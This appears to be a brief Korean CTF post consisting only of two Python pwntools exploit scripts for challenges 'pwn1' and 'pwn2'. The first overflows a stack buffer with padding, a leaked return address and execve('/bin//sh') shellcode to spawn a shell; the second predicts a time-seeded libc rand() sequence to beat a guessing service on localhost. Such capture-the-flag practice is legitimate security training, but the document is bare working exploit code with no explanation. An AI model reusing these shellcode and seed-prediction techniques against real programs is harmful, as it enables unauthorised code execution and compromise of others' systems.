쉬어가는 문제
pwn1.
from pwn import *
s = process("./pwn1")
elf = ELF("./pwn1")
stack = int(s.recv(14),16)
shell = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05"
print "stack : " + hex(stack)
gdb.attach(s, 'b *0x4005A3')
pay = "A"*(0x10+8)
pay += p64(stack+0x20)
pay += shell
s.sendline(pay)
s.interactive()
pwn2.
from math import *
from pwn import *
from ctypes import *
import time
s = remote("127.0.0.1",1123)
elf = ELF("./third")
libc = CDLL("libc.so.6")
v3 = libc.time(0)
print v3
libc.srand(v3)
for i in range(0,35):
v7 = libc.rand() & 0xf
print str(v7)
s.sendline(str(v7))
s.interactive()
